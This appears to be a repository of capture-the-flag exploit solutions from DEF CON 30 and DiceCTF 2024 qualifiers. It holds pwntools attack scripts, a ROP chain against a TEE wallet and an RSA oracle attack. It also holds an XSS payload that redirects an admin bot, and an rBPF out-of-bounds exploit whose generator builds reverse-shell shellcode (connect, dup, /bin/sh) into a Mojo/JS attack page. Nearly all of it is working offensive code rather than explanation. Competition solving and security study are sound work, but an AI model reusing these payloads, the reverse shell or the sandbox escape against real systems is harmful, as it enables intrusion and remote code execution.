├── defcon30-quals
    ├── crypto_chall
    │   ├── x.py
    │   └── x.sage
    └── teedium
    │   ├── Makefile
    │   ├── r.py
    │   ├── x.c
    │   └── x.py
├── dicectf24-quals
    ├── dicediceotter
    │   ├── README.md
    │   ├── index.html
    │   ├── main.rs
    │   └── sc.py
    └── floordrop
    │   ├── solve.py
    │   └── x.py
├── rwctf19-final
    ├── .gitkeep
    ├── FastStructureCache
    │   ├── FastStructureCache_2dbf4a3a826a007eb78fa6aa9c478ab6.tgz
    │   └── readme.txt
    ├── bank2
    │   ├── bank2.py
    │   ├── bank2_65a02395c12aec6e2f2f8a041149a75f.zip
    │   └── readme.txt
    ├── lock2018
    │   ├── lock2018_3df961bffa49bd0c93243ae8e73372a6.zip
    │   └── readme.txt
    ├── lock2019
    │   └── readme.txt
    ├── marxjs
    │   ├── MarxJS_08f783d8c2b3e53eab53c21210188177.zip
    │   └── readme.txt
    ├── model_is_program_i
    │   ├── Dockerfile
    │   ├── app.py
    │   ├── build.sh
    │   ├── readflag.c
    │   ├── readme.txt
    │   └── x.py
    ├── montagy
    │   └── readme.txt
    ├── printer
    │   ├── printer_cab303eb34695411d6b545fa9089402e.zip
    │   └── readme.txt
    ├── router2
    │   ├── hehe.c
    │   ├── kkk.c
    │   ├── mmm.py
    │   ├── openwrt_f0af8498f64862fce70f432b702daec5.bin
    │   ├── readme.txt
    │   ├── solution.txt
    │   └── x.py
    └── safari
    │   └── readme.txt
├── rwctf19-quals
    ├── across_the_great_wall.py
    ├── bank.py
    ├── caidanti1.c
    ├── caidanti1.py
    ├── caidanti2.c
    ├── dezhou_instrumentz.py
    ├── fax_sender.py
    ├── mop.php
    └── mop
    │   ├── Master_of_PHP.zip
    │   ├── mop.c
    │   ├── mop.php
    │   └── mop.py
└── rwctf20-21
    ├── dbaasadge.md
    ├── easy_defi.txt
    ├── easy_escape.c
    ├── easy_works.c
    ├── easy_works.py
    ├── game2048.py
    ├── homebrewed_curve.py
    └── personal_proxy.py


/defcon30-quals/crypto_chall/x.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | 
  3 | p = remote('crypto-challenge-lpw5gjiu6sqxi.shellweplayaga.me', 31337)
  4 | p.sendline('ticket{} ')
  5 | 
  6 | def menu(choice):
  7 |     p.recvuntil('>')
  8 |     p.sendline(str(choice))
  9 | 
 10 | qq = 0x468f42db6a682b136aadcacf3b8be3
 11 | pp = 0x20b14a31870069c5ff9a63b311d337
 12 | ee = 0x10001
 13 | nn = pp * qq
 14 | msg = 0x25
 15 | 
 16 | keynum = -1
 17 | 
 18 | def create_key_mes():
 19 |     global keynum
 20 | 
 21 |     menu(0)
 22 |     menu(0)
 23 |     keynum += 1
 24 |     return keynum
 25 | 
 26 | def create_key_13():
 27 |     global keynum
 28 | 
 29 |     menu(0)
 30 |     menu(1)
 31 |     keynum += 1
 32 |     return keynum
 33 | 
 34 | def create_bytekey():
 35 |     global keynum
 36 | 
 37 |     menu(0)
 38 |     menu(2)
 39 |     menu('0xf')
 40 |     keynum += 1
 41 |     return keynum
 42 | 
 43 | def create_key_epq():
 44 |     global keynum
 45 | 
 46 |     menu(0)
 47 |     menu(3)
 48 |     menu(hex(ee))
 49 |     menu(hex(pp))
 50 |     menu(hex(qq))
 51 |     keynum += 1
 52 |     return keynum
 53 | 
 54 | def create_key_edn():
 55 |     global keynum
 56 | 
 57 |     menu(0)
 58 |     menu(3)
 59 |     menu(hex(ee))
 60 |     menu(hex(dd))
 61 |     menu(hex(nn))
 62 |     keynum += 1
 63 |     return keynum
 64 | 
 65 | def decrypt(keynum, yesno=False):
 66 |     menu(2)
 67 |     menu(keynum)
 68 |     menu(1)
 69 |     menu(hex(msg))
 70 |     if yesno:
 71 |         menu('y')
 72 |     p.recvuntil('Your decrypted message is:\n\n')
 73 |     return p.recvuntil('\n\n', drop=True)
 74 | 
 75 | def encrypt(keynum, yesno=False, enc_msg=b"dank memes"):
 76 |     menu(1)
 77 |     menu(keynum)
 78 |     menu(enc_msg)
 79 |     p.recvuntil('Your encrypted message is:\n\n')
 80 |     return p.recvuntil('\n\n', drop=True)
 81 | 
 82 | create_key_epq()
 83 | create_key_mes()
 84 | 
 85 | def optimize(keynum):
 86 |     for _ in range(9):
 87 |         decrypt(keynum)
 88 |     return decrypt(keynum, True)
 89 | 
 90 | leak = optimize(0)
 91 | print('leak', leak.hex())
 92 | leak = int(leak.hex(), 16)
 93 | 
 94 | ee = int(raw_input('E from sage:'))
 95 | 
 96 | create_key_mes()
 97 | create_key_epq()
 98 | create_key_mes()
 99 | for _ in range(9):
100 |     decrypt(3)
101 | # decrypt multi msg
102 | menu(2)
103 | menu(3)
104 | menu(1)
105 | msg = '0x' + '0' * 14 + '2' + '0' * (0x60 - 21)
106 | msg = msg.ljust(0x5c)
107 | menu(msg)
108 | menu('y')
109 | flag = encrypt(4, enc_msg='0' * 0x40)
110 | flag = bytearray(bytes.fromhex(flag[2:].decode('utf-8')))
111 | print(flag)
112 | for i in range(len(flag)):
113 |     flag[i] ^= 0x30
114 | print(flag)
115 | # flag{dOnT_pUt_YoUr_lAmBdA_iN_a_LaMdA!!houchik3ohleet1ia7ohnoob7}
116 | 
117 | p.interactive()
118 | 


--------------------------------------------------------------------------------
/defcon30-quals/crypto_chall/x.sage:
--------------------------------------------------------------------------------
 1 | qq = 0x468f42db6a682b136aadcacf3b8be3
 2 | pp = 0x20b14a31870069c5ff9a63b311d337
 3 | ee = 0x10001
 4 | 
 5 | def reverse(l):
 6 |     dq = discrete_log(Mod(l, qq), Mod(37, qq))
 7 |     print(dq)
 8 |     dp = discrete_log(Mod(l, pp), Mod(37, pp))
 9 |     print(dp)
10 |     d = crt([dq, dp], [qq - 1, pp - 1])
11 |     print(d)
12 |     assert pow(37, d, pp * qq) == l
13 |     
14 |     phi = (pp - 1) * (qq - 1)
15 |     C = (0x4847464544434241 << 64) + 0x25a48
16 |     assert (d * ee - 1) % (qq - 1) == 0
17 |     for i in range(1, 0x10000):
18 |         r = ((phi * i + d) * ee - 1) / (qq - 1)
19 |         if i % 100 == 0:
20 |             print(i, r)
21 |         for dv in divisors(r):
22 |             if int(dv >> 64) == 0x4847464544434241:
23 |                 return dv - C + 1
24 | 
25 | def search(text_base):
26 |     C = (0x4847464544434241 << 64) + 0x25a48
27 |     x = C + text_base
28 |     z = text_base + 0x25a70
29 | 
30 |     for i in range(0, 0x100000, 2):
31 |         y = int((b'%010x' % i).hex(), 16)
32 |         t = (x - 1) * (y - 1) // gcd(x - 1, y - 1)
33 |         d, e, _ = xgcd(z, t)
34 |         e = e % t
35 |         if d == 1 and gcd(e, phi) == 1 and e < 2 ^ 256:
36 |             print(hex(y), e, hex(z))
37 |             return e
38 | 
39 | def pwn(l):
40 |     base = reverse(l)
41 |     print(hex(base))
42 |     search(base)
43 | 


--------------------------------------------------------------------------------
/defcon30-quals/teedium/Makefile:
--------------------------------------------------------------------------------
 1 | all: x
 2 | 
 3 | payload.h: x.py
 4 | 	python3 x.py
 5 | 
 6 | x: x.c payload.h Makefile
 7 | 	arm-linux-gnueabi-gcc -Wl,-I/lib/ld-linux-armhf.so.3 -pie -Os -o x x.c libteec.so libc-2.31.so ld-linux-armhf.so.3
 8 | 	arm-linux-gnueabi-strip x
 9 | 	gzip -c x | xxd -p > xx
10 | 


--------------------------------------------------------------------------------
/defcon30-quals/teedium/r.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | # FLAG{BGET begat Bitcoin? Yes, in this case, it did.}
 4 | 
 5 | context.log_level = 'DEBUG'
 6 | r = remote('secure-world-wallet-66zjw7mi3dnnk.shellweplayaga.me', 31337)
 7 | r.sendline(b'ticket{} ')
 8 | r.recvuntil(b'$')
 9 | r.sendline(b'cd /tmp/')
10 | r.recvuntil(b'$')
11 | 
12 | with open('./xx') as f:
13 |     for line in f.readlines():
14 |         r.sendline(('echo "%s" >> a' % line.strip()).encode('utf-8'))
15 |         r.recvuntil(b'$')
16 | 
17 | r.sendline('cat a | xxd -r -p | gunzip > x && chmod +x x')
18 | r.recvuntil(b'$')
19 | 
20 | r.sendline(b'./x 0x15a000')
21 | 
22 | r.interactive()
23 | 


--------------------------------------------------------------------------------
/defcon30-quals/teedium/x.c:
--------------------------------------------------------------------------------
  1 | #include <err.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <string.h>
  5 | #include "tee_client_api.h"
  6 | #include "payload.h"
  7 | 
  8 | int exploit(uint32_t base)
  9 | {
 10 |     TEEC_Result res;
 11 |     TEEC_Context ctx;
 12 |     TEEC_Session sess;
 13 |     TEEC_Operation op;
 14 |     TEEC_UUID uuid = { 0x7dc089d2, 0x883b, 0x4f7b, 
 15 |         { 0x81, 0x54, 0xea, 0x1d, 0xb9, 0xf1, 0xe7, 0xc3} };
 16 |     uint32_t err_origin;
 17 | 
 18 |     res = TEEC_InitializeContext(NULL, &ctx);
 19 |     if (res != TEEC_SUCCESS)
 20 |         errx(1, "TEEC_InitializeContext failed with code 0x%x", res);
 21 | 
 22 |     res = TEEC_OpenSession(&ctx, &sess, &uuid, TEEC_LOGIN_PUBLIC, NULL, NULL, &err_origin);
 23 |     if (res != TEEC_SUCCESS) {
 24 |         errx(1, "TEEC_Opensession failed with code 0x%x origin 0x%x", res, err_origin);
 25 |     }
 26 | 
 27 |     memset(&op, 0, sizeof(op));
 28 |     op.paramTypes = TEEC_PARAM_TYPES(TEEC_VALUE_OUTPUT, TEEC_NONE, TEEC_NONE, TEEC_NONE);
 29 | 
 30 |     res = TEEC_InvokeCommand(&sess, 0, &op, &err_origin);
 31 |     if (res != TEEC_SUCCESS) {
 32 |         errx(1, "TEEC_InvokeCommand failed with code 0x%x origin 0x%x", res, err_origin);
 33 |     }
 34 |     uint32_t wallet_id = op.params[0].value.a;
 35 | 
 36 |     if (base == 0) {
 37 |         printf("elf base: ");
 38 |         scanf("%x", &base);
 39 |     }
 40 |     const uint32_t malloc_ctx = base + 0x2A408;
 41 |     const uint32_t param = 0x00202000;
 42 |     const uint32_t pop_r0_r1_r2_r4_r5_pc = base + 0x2577f;
 43 |     const uint32_t pop_r7_pc = base + 0x2775;
 44 |     const uint32_t tee_memmove = base + 0x46E1;
 45 |     const uint32_t flag_func = base + 0x8F24;
 46 |     uint32_t sp = 0x00115c80;
 47 |     uint32_t *chunk = (uint32_t *)memmem(&payload, sizeof(payload), "MAGIC", 5);
 48 |     uint32_t offset = (uintptr_t)chunk - (uintptr_t)&payload;
 49 |     chunk[0] = 0;
 50 |     chunk[1] = 0x10;
 51 |     chunk[2] = sp - 0xc;
 52 |     chunk[3] = param + 0x1008;
 53 | 
 54 |     chunk = (uint32_t *)&payload[0x1000];
 55 |     memset(chunk, 0xee, 0x200);
 56 | 
 57 |     chunk[3] = pop_r0_r1_r2_r4_r5_pc;
 58 |     chunk[4] = 0x115000;
 59 |     chunk[5] = 0x400;
 60 |     chunk[9] = flag_func + 4;
 61 |     chunk[13] = pop_r0_r1_r2_r4_r5_pc;
 62 |     chunk[14] = 0x203060; // &chunk[22]
 63 |     chunk[15] = 0x115f24;
 64 |     chunk[16] = 0x4;
 65 |     chunk[19] = tee_memmove + 4;
 66 |     chunk[21] = pop_r0_r1_r2_r4_r5_pc;
 67 |     chunk[22] = 0xdeadbeef; // FIXME
 68 |     chunk[23] = 0x115000;
 69 |     chunk[24] = 0x400;
 70 |     chunk[27] = tee_memmove + 4;
 71 |     chunk[29] = pop_r0_r1_r2_r4_r5_pc;
 72 |     chunk[30] = 0;
 73 |     chunk[31] = 0;
 74 |     chunk[35] = pop_r7_pc;
 75 |     chunk[36] = 0x115ee0;
 76 |     chunk[37] = base + 0x27e1;
 77 | 
 78 |     uint8_t result[0x1000] = {0};
 79 |     memset(&result, 'X', sizeof(result));
 80 |     memset(&op, 0, sizeof(op));
 81 |     op.paramTypes = TEEC_PARAM_TYPES(TEEC_VALUE_INPUT, TEEC_VALUE_INPUT, TEEC_MEMREF_TEMP_INPUT, TEEC_MEMREF_TEMP_OUTPUT);
 82 |     op.params[0].value.a = wallet_id;
 83 |     op.params[1].value.a = 0;
 84 |     op.params[2].tmpref.buffer = (void *)&payload;
 85 |     op.params[2].tmpref.size = sizeof(payload);
 86 |     op.params[3].tmpref.buffer = &result;
 87 |     op.params[3].tmpref.size = sizeof(result);
 88 | 
 89 |     res = TEEC_InvokeCommand(&sess, 3, &op, &err_origin);
 90 | 
 91 |     TEEC_CloseSession(&sess);
 92 | 
 93 |     TEEC_FinalizeContext(&ctx);
 94 | 
 95 |     int size = op.params[3].tmpref.size;
 96 |     if (res == 0xffff3024 || size == 0) {
 97 |         return -1;
 98 |     }
 99 |     printf("res %#x size %#x\n", res, size);
100 |     write(1, &result[0], size);
101 |     return 0;
102 | }
103 | 
104 | int main(int argc, char *argv[])
105 | {
106 |     uint32_t base = argc > 1 ? strtoul(argv[1], NULL, 16) : 0;
107 | 
108 |     for (int i = 0; ; i++) {
109 |         int res = 0;
110 |         int pid = fork();
111 |         if (!pid) {
112 |             exit(exploit(base));
113 |         }
114 |         waitpid(pid, &res, 0);
115 |         printf("%d %#x\n", i, res);
116 |         if (res == 0) {
117 |             break;
118 |         }
119 |     }
120 | }
121 | 


--------------------------------------------------------------------------------
/defcon30-quals/teedium/x.py:
--------------------------------------------------------------------------------
 1 | import struct
 2 | p32 = lambda _: struct.pack('<I', _)
 3 | p64 = lambda _: struct.pack('<Q', _)
 4 | 
 5 | def pack_varint(l):
 6 |     if l < 0xFD:
 7 |         return bytes([l])
 8 |     elif l < 0x10000:
 9 |         return bytes([0xfd]) + struct.pack('>H', l)
10 |     assert 0
11 | 
12 | def pack_varbytes(s):
13 |     return pack_varint(len(s)) + s
14 | 
15 | def pack_request(wallet_id, itemA, itemB):
16 |     s = b''
17 |     s += p32(wallet_id)
18 | 
19 |     s += pack_varint(len(itemA))
20 |     for item in itemA:
21 |         assert len(item[0]) == 0x20
22 |         s += item[0]
23 |         s += p32(item[1])
24 |         s += pack_varbytes(item[2])
25 |         s += p32(item[3])
26 | 
27 |     s += pack_varint(len(itemB))
28 |     for item in itemB:
29 |         s += p64(item[0])
30 |         s += pack_varbytes(item[1])
31 |     s += p32(0xdddddddd)
32 |     return s
33 | 
34 | make_chunk = lambda _: (b'J' * 0x20, 0xfff, b'j' * _, 0xeee)
35 | 
36 | a0 = (b'A' * 0x20, 0x111, b'a' * 0x200, 0x111)
37 | b0 = (0xaaa, b'a' * 0x82)
38 | p1 = pack_request(0, [make_chunk(0x1a20 - 0x400), make_chunk(0x20)], [b0])
39 | p1 += b'\x55' * 0x25ce
40 | p1 += b'MAGIC'
41 | p1 = p1.ljust(0x59f0, b'\x66')
42 | print(p1.hex())
43 | 
44 | with open('payload.h', 'w') as f:
45 |     f.write('unsigned char payload[] = {%s};\n' % str(list(map(int, p1)))[1:-1])
46 | 


--------------------------------------------------------------------------------
/dicectf24-quals/dicediceotter/README.md:
--------------------------------------------------------------------------------
1 | # dicediceotter
2 | 
3 | 1. Reverse engineering the Solana program: The cheat code for the game is a 12-byte sequence starting with [1, 7, 7, 6], and the product of the 12 integers is 430,040,725,982,322.
4 | 2. Trigger the XSS bug by setting the innerHTML with a controlled `winner.name`. Use the following payload: https://ddg.mc.ax/?code=AQcHBg1lnbXFxwEB;<style onload=location="//shortdomain">. Now we can redirect the admin bot to a controlled site.
5 | 3. Exploit the OOB bug in firedancer. The bug stems from a misconfiguration of the heap size in the Solana VM. We can write RBPF assembly to gain direct memory access beyond the virtual heap, which resides on the current thread's stack.
6 | 


--------------------------------------------------------------------------------
/dicectf24-quals/dicediceotter/index.html:
--------------------------------------------------------------------------------
 1 | 
 2 | <script src="/mojojs/mojo_bindings.js"></script>
 3 | <script src="/mojojs/gen/third_party/blink/public/mojom/otter/otter_vm.mojom.js"></script>
 4 | <script>
 5 | const sleep = (ms) => new Promise((res) => setTimeout(res, ms));
 6 | async function exploit() {
 7 |         const ptr = new blink.mojom.OtterVMPtr();
 8 |         Mojo.bindInterface(
 9 |                 blink.mojom.OtterVM.name,
10 |                 mojo.makeRequest(ptr).handle,
11 |         );
12 |         await sleep(100);
13 |         let data = new Uint8Array([183,3,0,0,3,0,0,0,103,3,0,0,32,0,0,0,183,1,0,0,0,2,4,0,15,49,0,0,0,0,0,0,121,21,0,0,0,0,0,0,183,0,0,0,192,0,0,0,31,5,0,0,0,0,0,0,183,7,0,0,64,0,0,0,15,87,0,0,0,0,0,0,121,18,8,0,0,0,0,0,183,0,0,0,172,33,145,26,31,2,0,0,0,0,0,0,183,4,0,0,82,127,102,23,15,36,0,0,0,0,0,0,123,65,8,0,0,0,0,0,183,4,0,0,7,0,0,0,123,65,16,0,0,0,0,0,183,4,0,0,174,207,219,33,15,36,0,0,0,0,0,0,123,65,24,0,0,0,0,0,183,4,0,0,0,64,0,0,191,86,0,0,0,0,0,0,159,70,0,0,0,0,0,0,31,101,0,0,0,0,0,0,123,65,32,0,0,0,0,0,123,81,40,0,0,0,0,0,183,4,0,0,20,164,227,20,15,36,0,0,0,0,0,0,123,65,48,0,0,0,0,0,123,113,56,0,0,0,0,0,114,1,64,0,106,0,0,0,114,1,65,0,41,0,0,0,114,1,66,0,88,0,0,0,114,1,67,0,106,0,0,0,114,1,68,0,2,0,0,0,114,1,69,0,95,0,0,0,114,1,70,0,106,0,0,0,114,1,71,0,1,0,0,0,114,1,72,0,94,0,0,0,114,1,73,0,153,0,0,0,114,1,74,0,15,0,0,0,114,1,75,0,5,0,0,0,114,1,76,0,72,0,0,0,114,1,77,0,137,0,0,0,114,1,78,0,197,0,0,0,114,1,79,0,72,0,0,0,114,1,80,0,184,0,0,0,114,1,81,0,1,0,0,0,114,1,82,0,1,0,0,0,114,1,83,0,1,0,0,0,114,1,84,0,1,0,0,0,114,1,85,0,1,0,0,0,114,1,86,0,1,0,0,0,114,1,87,0,1,0,0,0,114,1,88,0,2,0,0,0,114,1,89,0,80,0,0,0,114,1,90,0,72,0,0,0,114,1,91,0,184,0,0,0,114,1,92,0,3,0,0,0,114,1,93,0,1,0,0,0,114,1,94,0,254,0,0,0,114,1,95,0,230,0,0,0,114,1,96,0,126,0,0,0,114,1,97,0,1,0,0,0,114,1,98,0,1,0,0,0,114,1,99,0,3,0,0,0,114,1,100,0,72,0,0,0,114,1,101,0,49,0,0,0,114,1,102,0,4,0,0,0,114,1,103,0,36,0,0,0,114,1,104,0,106,0,0,0,114,1,105,0,42,0,0,0,114,1,106,0,88,0,0,0,114,1,107,0,72,0,0,0,114,1,108,0,137,0,0,0,114,1,109,0,239,0,0,0,114,1,110,0,106,0,0,0,114,1,111,0,16,0,0,0,114,1,112,0,90,0,0,0,114,1,113,0,72,0,0,0,114,1,114,0,137,0,0,0,114,1,115,0,230,0,0,0,114,1,116,0,15,0,0,0,114,1,117,0,5,0,0,0,114,1,118,0,106,0,0,0,114,1,119,0,3,0,0,0,114,1,120,0,94,0,0,0,114,1,121,0,72,0,0,0,114,1,122,0,255,0,0,0,114,1,123,0,206,0,0,0,114,1,124,0,120,0,0,0,114,1,125,0,11,0,0,0,114,1,126,0,86,0,0,0,114,1,127,0,106,0,0,0,114,1,128,0,33,0,0,0,114,1,129,0,88,0,0,0,114,1,130,0,72,0,0,0,114,1,131,0,137,0,0,0,114,1,132,0,239,0,0,0,114,1,133,0,15,0,0,0,114,1,134,0,5,0,0,0,114,1,135,0,235,0,0,0,114,1,136,0,239,0,0,0,114,1,137,0,106,0,0,0,114,1,138,0,104,0,0,0,114,1,139,0,72,0,0,0,114,1,140,0,184,0,0,0,114,1,141,0,47,0,0,0,114,1,142,0,98,0,0,0,114,1,143,0,105,0,0,0,114,1,144,0,110,0,0,0,114,1,145,0,47,0,0,0,114,1,146,0,47,0,0,0,114,1,147,0,47,0,0,0,114,1,148,0,115,0,0,0,114,1,149,0,80,0,0,0,114,1,150,0,72,0,0,0,114,1,151,0,137,0,0,0,114,1,152,0,231,0,0,0,114,1,153,0,104,0,0,0,114,1,154,0,114,0,0,0,114,1,155,0,105,0,0,0,114,1,156,0,1,0,0,0,114,1,157,0,1,0,0,0,114,1,158,0,129,0,0,0,114,1,159,0,52,0,0,0,114,1,160,0,36,0,0,0,114,1,161,0,1,0,0,0,114,1,162,0,1,0,0,0,114,1,163,0,1,0,0,0,114,1,164,0,1,0,0,0,114,1,165,0,49,0,0,0,114,1,166,0,246,0,0,0,114,1,167,0,86,0,0,0,114,1,168,0,106,0,0,0,114,1,169,0,8,0,0,0,114,1,170,0,94,0,0,0,114,1,171,0,72,0,0,0,114,1,172,0,1,0,0,0,114,1,173,0,230,0,0,0,114,1,174,0,86,0,0,0,114,1,175,0,72,0,0,0,114,1,176,0,137,0,0,0,114,1,177,0,230,0,0,0,114,1,178,0,49,0,0,0,114,1,179,0,210,0,0,0,114,1,180,0,106,0,0,0,114,1,181,0,59,0,0,0,114,1,182,0,88,0,0,0,114,1,183,0,15,0,0,0,114,1,184,0,5,0,0,0,149,0,0,0,0,0,0,0]);
14 |         let entrypoint = 0;
15 |         await ptr.init(data, entrypoint);
16 |         data = new Uint8Array(1_024);
17 |         var resp = (await ptr.run(data)).resp;
18 | }
19 | setTimeout(exploit, 1000);
20 | </script>
21 | 


--------------------------------------------------------------------------------
/dicectf24-quals/dicediceotter/main.rs:
--------------------------------------------------------------------------------
  1 | extern crate rbpf;
  2 | use rbpf::assembler::assemble;
  3 | 
  4 | fn main() {
  5 |     // r3 = 0x3 << 32
  6 |     // r2 = prog base
  7 |     // r5 = sp
  8 |     // mprotect = 0x14E3A414
  9 |     // pop rdx = 0x17667F52
 10 |     // pop rsi rdi = 0x21DBCFAE
 11 |     let prog = assemble(
 12 |         "
 13 |         mov64 r3, 0x3
 14 |         lsh r3, 32
 15 |         mov64 r1, 0x40200
 16 |         add r1, r3
 17 | 
 18 |         ldxdw r5, [r1]
 19 |         mov64 r0, 0xc0
 20 |         sub r5, r0
 21 |         mov64 r7, 0x40
 22 |         add r7, r5
 23 | 
 24 |         ldxdw r2, [r1+8]
 25 |         mov64 r0, 0x1a9121ac
 26 |         sub r2, r0
 27 | 
 28 |         mov64 r4, 0x17667F52
 29 |         add r4, r2
 30 |         stxdw [r1+8], r4
 31 |         mov64 r4, 7
 32 |         stxdw [r1+16], r4
 33 |         mov64 r4, 0x21DBCFAE
 34 |         add r4, r2
 35 |         stxdw [r1+24], r4
 36 |         mov64 r4, 0x4000
 37 |         mov r6, r5
 38 |         mod r6, r4
 39 |         sub r5, r6
 40 |         stxdw [r1+32], r4
 41 |         stxdw [r1+40], r5
 42 |         mov64 r4, 0x14E3A414
 43 |         add r4, r2
 44 |         stxdw [r1+48], r4
 45 |         stxdw [r1+56], r7
 46 | 
 47 |         stb [r1+64], 106
 48 |         stb [r1+65], 41
 49 |         stb [r1+66], 88
 50 |         stb [r1+67], 106
 51 |         stb [r1+68], 2
 52 |         stb [r1+69], 95
 53 |         stb [r1+70], 106
 54 |         stb [r1+71], 1
 55 |         stb [r1+72], 94
 56 |         stb [r1+73], 153
 57 |         stb [r1+74], 15
 58 |         stb [r1+75], 5
 59 |         stb [r1+76], 72
 60 |         stb [r1+77], 137
 61 |         stb [r1+78], 197
 62 |         stb [r1+79], 72
 63 |         stb [r1+80], 184
 64 |         stb [r1+81], 1
 65 |         stb [r1+82], 1
 66 |         stb [r1+83], 1
 67 |         stb [r1+84], 1
 68 |         stb [r1+85], 1
 69 |         stb [r1+86], 1
 70 |         stb [r1+87], 1
 71 |         stb [r1+88], 2
 72 |         stb [r1+89], 80
 73 |         stb [r1+90], 72
 74 |         stb [r1+91], 184
 75 |         stb [r1+92], 3
 76 |         stb [r1+93], 1
 77 |         stb [r1+94], 254
 78 |         stb [r1+95], 230
 79 |         stb [r1+96], 126
 80 |         stb [r1+97], 1
 81 |         stb [r1+98], 1
 82 |         stb [r1+99], 3
 83 |         stb [r1+100], 72
 84 |         stb [r1+101], 49
 85 |         stb [r1+102], 4
 86 |         stb [r1+103], 36
 87 |         stb [r1+104], 106
 88 |         stb [r1+105], 42
 89 |         stb [r1+106], 88
 90 |         stb [r1+107], 72
 91 |         stb [r1+108], 137
 92 |         stb [r1+109], 239
 93 |         stb [r1+110], 106
 94 |         stb [r1+111], 16
 95 |         stb [r1+112], 90
 96 |         stb [r1+113], 72
 97 |         stb [r1+114], 137
 98 |         stb [r1+115], 230
 99 |         stb [r1+116], 15
100 |         stb [r1+117], 5
101 |         stb [r1+118], 106
102 |         stb [r1+119], 3
103 |         stb [r1+120], 94
104 |         stb [r1+121], 72
105 |         stb [r1+122], 255
106 |         stb [r1+123], 206
107 |         stb [r1+124], 120
108 |         stb [r1+125], 11
109 |         stb [r1+126], 86
110 |         stb [r1+127], 106
111 |         stb [r1+128], 33
112 |         stb [r1+129], 88
113 |         stb [r1+130], 72
114 |         stb [r1+131], 137
115 |         stb [r1+132], 239
116 |         stb [r1+133], 15
117 |         stb [r1+134], 5
118 |         stb [r1+135], 235
119 |         stb [r1+136], 239
120 |         stb [r1+137], 106
121 |         stb [r1+138], 104
122 |         stb [r1+139], 72
123 |         stb [r1+140], 184
124 |         stb [r1+141], 47
125 |         stb [r1+142], 98
126 |         stb [r1+143], 105
127 |         stb [r1+144], 110
128 |         stb [r1+145], 47
129 |         stb [r1+146], 47
130 |         stb [r1+147], 47
131 |         stb [r1+148], 115
132 |         stb [r1+149], 80
133 |         stb [r1+150], 72
134 |         stb [r1+151], 137
135 |         stb [r1+152], 231
136 |         stb [r1+153], 104
137 |         stb [r1+154], 114
138 |         stb [r1+155], 105
139 |         stb [r1+156], 1
140 |         stb [r1+157], 1
141 |         stb [r1+158], 129
142 |         stb [r1+159], 52
143 |         stb [r1+160], 36
144 |         stb [r1+161], 1
145 |         stb [r1+162], 1
146 |         stb [r1+163], 1
147 |         stb [r1+164], 1
148 |         stb [r1+165], 49
149 |         stb [r1+166], 246
150 |         stb [r1+167], 86
151 |         stb [r1+168], 106
152 |         stb [r1+169], 8
153 |         stb [r1+170], 94
154 |         stb [r1+171], 72
155 |         stb [r1+172], 1
156 |         stb [r1+173], 230
157 |         stb [r1+174], 86
158 |         stb [r1+175], 72
159 |         stb [r1+176], 137
160 |         stb [r1+177], 230
161 |         stb [r1+178], 49
162 |         stb [r1+179], 210
163 |         stb [r1+180], 106
164 |         stb [r1+181], 59
165 |         stb [r1+182], 88
166 |         stb [r1+183], 15
167 |         stb [r1+184], 5
168 | 
169 |         exit
170 |         "
171 |     ).unwrap();
172 | 
173 |     println!("{:?}", prog);
174 | }
175 | 


--------------------------------------------------------------------------------
/dicectf24-quals/dicediceotter/sc.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context.arch = 'amd64'
 3 | 
 4 | # cat /flag-8cc1f041ca1d8eeec933c6b436bb72cd.txt
 5 | # dice{danc1ng_0n_f1r3_c71d311}
 6 | 
 7 | sc = shellcraft.amd64.connect('127.0.0.1', 65511)
 8 | sc += shellcraft.amd64.dup()
 9 | sc += shellcraft.amd64.sh()
10 | 
11 | b = asm(sc)
12 | 
13 | '''
14 | for i, x in enumerate(b):
15 |     print('stb [r1+%d], %d' % (64 + i, x))
16 |     '''
17 | 
18 | rbpf = [183, 3, 0, 0, 3, 0, 0, 0, 103, 3, 0, 0, 32, 0, 0, 0, 183, 1, 0, 0, 0, 2, 4, 0, 15, 49, 0, 0, 0, 0, 0, 0, 121, 21, 0, 0, 0, 0, 0, 0, 183, 0, 0, 0, 192, 0, 0, 0, 31, 5, 0, 0, 0, 0, 0, 0, 183, 7, 0, 0, 64, 0, 0, 0, 15, 87, 0, 0, 0, 0, 0, 0, 121, 18, 8, 0, 0, 0, 0, 0, 183, 0, 0, 0, 172, 33, 145, 26, 31, 2, 0, 0, 0, 0, 0, 0, 183, 4, 0, 0, 82, 127, 102, 23, 15, 36, 0, 0, 0, 0, 0, 0, 123, 65, 8, 0, 0, 0, 0, 0, 183, 4, 0, 0, 7, 0, 0, 0, 123, 65, 16, 0, 0, 0, 0, 0, 183, 4, 0, 0, 174, 207, 219, 33, 15, 36, 0, 0, 0, 0, 0, 0, 123, 65, 24, 0, 0, 0, 0, 0, 183, 4, 0, 0, 0, 64, 0, 0, 191, 86, 0, 0, 0, 0, 0, 0, 159, 70, 0, 0, 0, 0, 0, 0, 31, 101, 0, 0, 0, 0, 0, 0, 123, 65, 32, 0, 0, 0, 0, 0, 123, 81, 40, 0, 0, 0, 0, 0, 183, 4, 0, 0, 20, 164, 227, 20, 15, 36, 0, 0, 0, 0, 0, 0, 123, 65, 48, 0, 0, 0, 0, 0, 123, 113, 56, 0, 0, 0, 0, 0]
19 | 
20 | print(len(rbpf))
21 | for i, x in enumerate(b):
22 |     # print('stb [r1+%d], %d' % (64 + i, x))
23 |     rbpf += [114, 1, 64 + i, 0, x, 0, 0, 0]
24 | rbpf += [149, 0, 0, 0, 0, 0, 0, 0]
25 | 
26 | jsexp = b'''
27 | <script src="/mojojs/mojo_bindings.js"></script>
28 | <script src="/mojojs/gen/third_party/blink/public/mojom/otter/otter_vm.mojom.js"></script>
29 | <script>
30 | const sleep = (ms) => new Promise((res) => setTimeout(res, ms));
31 | async function exploit() {
32 |         const ptr = new blink.mojom.OtterVMPtr();
33 |         Mojo.bindInterface(
34 |                 blink.mojom.OtterVM.name,
35 |                 mojo.makeRequest(ptr).handle,
36 |         );
37 |         await sleep(100);
38 |         let data = new Uint8Array(%s);
39 |         let entrypoint = 0;
40 |         await ptr.init(data, entrypoint);
41 |         data = new Uint8Array(1_024);
42 |         var resp = (await ptr.run(data)).resp;
43 | }
44 | setTimeout(exploit, 1000);
45 | </script>
46 | ''' % (repr(rbpf).encode('utf-8').replace(b' ', b''))
47 | open('index.html', 'wb').write(jsexp)
